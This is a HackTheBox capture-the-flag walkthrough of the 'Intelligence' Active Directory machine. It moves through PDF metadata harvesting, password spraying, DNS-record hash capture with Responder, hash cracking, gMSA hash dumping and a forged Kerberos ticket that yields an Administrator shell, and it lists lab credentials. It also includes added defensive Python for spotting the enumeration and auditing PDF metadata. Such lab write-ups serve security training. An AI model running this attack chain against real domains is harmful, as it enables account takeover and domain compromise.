HackTheBox – Intelligence

┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A -v -T4 -Pn 10.10.10.248

┌──(rootkali)-[/home/kali/Downloads]
└─# echo 10.10.10.248 dc.intelligence.htb intelligence.htb > /etc/hosts

http://intelligence.htb/

http://intelligence.htb/documents/2020-01-01-upload.pdf

http://intelligence.htb/documents/2020-12-15-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]
└─# wget http://intelligence.htb/documents/2020-01-01-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]
└─# wget http://intelligence.htb/documents/2020-12-15-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]
└─# exiftool 2020-01-01-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]
└─# exiftool 2020-12-15-upload.pdf

Now we have two potential usernames (from the Creator field of each PDF). Let’s see if they are “AS-REP Roastable”:

┌──(rootkali)-[/home/kali/Downloads]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile users.txt -dc-ip 10.10.10.248 -no-pass intelligence.htb/

https://github.com/ropnop/kerbrute

┌──(rootkali)-[/home/kali/Downloads]
└─# kerbrute -dc-ip 10.10.10.248 -domain intelligence.htb -users users.txt

The usernames are valid, but neither account is AS-REP roastable, so we have reached a dead end.

Finding more files and usernames

Looking at the PDF filenames (2020-01-01-upload.pdf and 2020-12-15-upload.pdf), we can guess that more files may be stored on the webserver with the same naming convention (namely, YYYY-MM-DD-upload.pdf).

In order to try every possible date within the year 2020, I decided to use a Go script called reqPdf.go, which makes all the requests and downloads the files that exist in less than a second:

https://github.com/7Rocky/HackTheBox-scripts/tree/main/Machines/Intelligence#reqPdfgo

┌──(rootkali)-[/home/kali/Downloads]
└─# cat reqPdf.go

┌──(rootkali)-[/home/kali/Downloads]
└─# go run reqPdf.go
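From the defender's side, this step leaves a very recognisable footprint in the web server's access log: a single client requesting dozens of distinct YYYY-MM-DD-upload.pdf paths within seconds, most of them answered 404. The detector below is an added example (not part of this writeup or of the linked reqPdf.go); it runs over constructed combined-format log lines, and the window and threshold values are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" access-log line; the site's documents live under /documents/.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
DATED_UPLOAD_RE = re.compile(r"^/documents/\d{4}-\d{2}-\d{2}-upload\.pdf$")
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """One access-log line -> dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "path": m["path"], "status": int(m["status"])}

def detect_date_enumeration(lines, window_s=60, min_paths=20, min_404_ratio=0.5):
    """Flag clients that hit many distinct dated-upload paths within window_s seconds, mostly
    404: the footprint of guessing the filename pattern rather than following links."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and DATED_UPLOAD_RE.match(rec["path"]):
            by_ip[rec["ip"]].append(rec)
    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best, lo = None, 0
        for hi in range(len(recs)):                      # sliding window over this client's hits
            while (recs[hi]["ts"] - recs[lo]["ts"]).total_seconds() > window_s:
                lo += 1
            window = recs[lo:hi + 1]
            paths = {r["path"] for r in window}
            misses = sum(r["status"] == 404 for r in window)
            if (len(paths) >= min_paths and misses / len(window) >= min_404_ratio
                    and (best is None or len(paths) > best["distinct_paths"])):
                best = {"ip": ip, "distinct_paths": len(paths), "not_found": misses}
        if best:                                         # one finding per offending client
            findings.append(best)
    return findings

def constructed_log():
    """Constructed traffic, not real logs: one client walks all of January 2020 in 30 s (only the 1st and 15th exist), plus an ordinary visitor."""
    lines = [f'10.10.14.12 - - [10/Jul/2021:13:05:{day:02d} +0000] "GET /documents/2020-01-{day:02d}-upload.pdf HTTP/1.1" '
             f'{200 if day in (1, 15) else 404} 512 "-" "Go-http-client/1.1"' for day in range(1, 32)]
    lines.append('10.10.14.99 - - [10/Jul/2021:13:10:00 +0000] "GET /documents/2020-01-01-upload.pdf HTTP/1.1" 200 25600 "http://intelligence.htb/" "Mozilla/5.0"')
    lines.append('10.10.14.99 - - [10/Jul/2021:13:12:30 +0000] "GET /documents/2020-12-15-upload.pdf HTTP/1.1" 200 31100 "http://intelligence.htb/" "Mozilla/5.0"')
    return lines
```

Feeding a real access log to detect_date_enumeration (one line per list element) returns the clients that should be looked at; an ordinary visitor who only follows the two linked PDFs never reaches the threshold.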

┌──(rootkali)-[/home/kali/Downloads]
└─# exiftool *.pdf | grep Creator | awk '{ print $3 }' | sort -u | tee users.txt
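The usernames come from the Creator field that the authoring software left in each PDF, so the fix on the publishing side is to audit document metadata before anything goes on the webserver. The script below is an added example (not from this writeup): a stdlib-only Python check that pulls Author/Creator/Producer out of each PDF's Info dictionary and flags First.Last-shaped values; the sample PDF bytes and the username pattern are constructed assumptions.

```python
import re
from pathlib import Path

IDENTITY_KEYS = (b"Author", b"Creator", b"Producer")   # Info-dict keys that carry a person's name
USERNAME_RE = re.compile(r"^[A-Za-z][A-Za-z'\-]+\.[A-Za-z][A-Za-z'\-]+$")  # First.Last account shape

def _pdf_string(data, start):
    """Decode the PDF string object at data[start]: (literal) or <hex>."""
    if data[start:start + 1] == b"<":
        end = data.find(b">", start)
        raw = bytes.fromhex("".join(data[start + 1:end].decode("ascii", "replace").split()))
        if raw.startswith(b"\xfe\xff"):                 # UTF-16BE text string with BOM
            return raw[2:].decode("utf-16-be", "replace")
        return raw.decode("latin-1")                    # PDFDocEncoding, close enough for names
    out, depth, i = bytearray(), 0, start
    while i < len(data):                                # literal string; parentheses may nest
        c = data[i:i + 1]
        if c == b"\\":                                  # escape: keep the next byte literally
            out += data[i + 1:i + 2]; i += 2; continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            return bytes(out[1:]).decode("latin-1")     # drop the opening "("
        out += c; i += 1
    return None

def pdf_metadata(data):
    """Identity-bearing Info-dictionary entries in raw PDF bytes. Only uncompressed Info
    dictionaries are seen (object streams are not), so an empty result is inconclusive."""
    found = {}
    for key in IDENTITY_KEYS:
        for m in re.finditer(rb"/" + key + rb"\s*(?=[(<])", data):
            value = _pdf_string(data, m.end())
            if value:
                found[key.decode()] = value.strip()
    return found

def find_user_leaks(documents):
    """(filename, key, value) for each metadata value shaped like a user account."""
    return [(name, key, value) for name, data in documents.items()
            for key, value in pdf_metadata(data).items() if USERNAME_RE.match(value)]

def audit_directory(directory):
    """Run the check over every *.pdf in a directory, e.g. before publishing."""
    return find_user_leaks({p.name: p.read_bytes() for p in sorted(Path(directory).glob("*.pdf"))})

# Constructed sample, not one of the box's files: a minimal PDF carrying the name in literal and UTF-16 hex form.
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
              b"2 0 obj\n<< /Creator (Jane.Doe) /Producer (Microsoft Word) "
              b"/Author <FEFF004A0061006E0065002E0044006F0065> >>\nendobj\n"
              b"trailer\n<< /Root 1 0 R /Info 2 0 R >>\n%%EOF\n")
```

Anything audit_directory reports should be stripped (exiftool -all= does it) before the file is published; an empty report only means nothing was found in the uncompressed Info dictionary.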

┌──(rootkali)-[/home/kali/Downloads]
└─# kerbrute -dc-ip 10.10.10.248 -domain intelligence.htb -users users.txt

Among the downloaded PDFs we also find a password: NewIntelligenceCorpUser9876

┌──(rootkali)-[/home/kali/Downloads]
└─# crackmapexec smb 10.10.10.248 -u users.txt -p 'NewIntelligenceCorpUser9876'

The password spray gives us the user it belongs to:

intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

┌──(rootkali)-[/home/kali/Downloads]
└─# crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 --shares

┌──(rootkali)-[/home/kali/Downloads]
└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 -r Users

┌──(rootkali)-[/home/kali/Downloads]
└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 --download 'Users\Tiffany.Molina\Desktop\user.txt'

┌──(rootkali)-[/home/kali/Downloads]
└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 -r IT

┌──(rootkali)-[/home/kali/Downloads]
└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 --download 'IT\downdetector.ps1'

┌──(rootkali)-[/home/kali/Downloads]
└─# responder -I tun0 -wrf

┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/dirkjanm/krbrelayx.git

┌──(rootkali)-[/home/kali/Downloads]
└─# cd krbrelayx

┌──(rootkali)-[/home/kali/Downloads/krbrelayx]
└─# ls

┌──(rootkali)-[/home/kali/Downloads/krbrelayx]
└─# python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.12 10.10.10.248

Now that our record is in DNS, let’s wait for the hash to arrive in Responder. Note that this may take up to 5 minutes, so be patient.

┌──(rootkali)-[/home/kali/Downloads]
└─# cat hash

┌──(rootkali)-[/home/kali/Downloads]
└─# john hash --wordlist=rockyou.txt

Password: Mr.Teddy

username = Ted.Graves
password = Mr.Teddy

┌──(rootkali)-[/home/kali/Downloads]
└─# crackmapexec smb 10.10.10.248 -u Ted.Graves -p 'Mr.Teddy'

┌──(rootkali)-[/home/kali/Downloads/BloodHound.py]
└─# bloodhound-python -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc dc.intelligence.htb -ns 10.10.10.248 --dns-timeout 60 -w 1

┌──(rootkali)-[/home/kali/Downloads/BloodHound.py]
└─# neo4j console

Reset the neo4j password from here.

┌──(rootkali)-[/home/kali/Downloads/krbrelayx]
└─# bloodhound

As shown above, Ted.Graves belongs to the ITSupport group, and the members of this group have the privilege to read the password of svc_int$, which is a group managed service account (gMSA). Using gMSADumper, we can obtain the NTLM hash of this service account:

https://github.com/micahvandeusen/gMSADumper

┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/micahvandeusen/gMSADumper.git

┌──(rootkali)-[/home/kali/Downloads/gMSADumper]
└─# python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'

Now that we have the NTLM hash of svc_int$, it’s time to perform a Silver Ticket attack. As in every Kerberos attack, first we must synchronize our clock with the server (using ntpdate or rdate), because the KDC rejects requests whose timestamp is skewed by more than 5 minutes:

┌──(rootkali)-[/home/kali/Downloads]
└─# ntpdate 10.10.10.248

And now we can obtain a Silver Ticket to impersonate Administrator using Impacket’s getST.py, specifying the hash of svc_int$:

┌──(rootkali)-[/home/kali/Downloads]
└─# python3 /usr/share/doc/python3-impacket/examples/getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator -dc-ip 10.10.10.248 -hashes :b98d4cef68f72a98dfeed732d1b1abca intelligence.htb/svc_int$

┌──(rootkali)-[/home/kali/Downloads]
└─# export KRB5CCNAME=Administrator.ccache

┌──(rootkali)-[/home/kali/Downloads]
└─# python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -k -no-pass -dc-ip 10.10.10.248 intelligence.htb/Administrator@dc.intelligence.htb

C:\>whoami
C:\>type C:\Users\Administrator\Desktop\root.txt

Hi, I’m saksham dixit
